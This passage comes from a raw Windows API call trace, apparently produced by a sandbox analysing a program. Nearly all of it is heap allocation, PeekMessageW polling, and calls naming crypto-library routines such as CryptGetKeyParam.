(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.677] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.678] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.678] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0032.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.679] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0032.680] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0032.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.681] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.684] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.684] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.684] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.684] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.684] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.684] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.684] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.684] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.685] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.685] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.685] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, 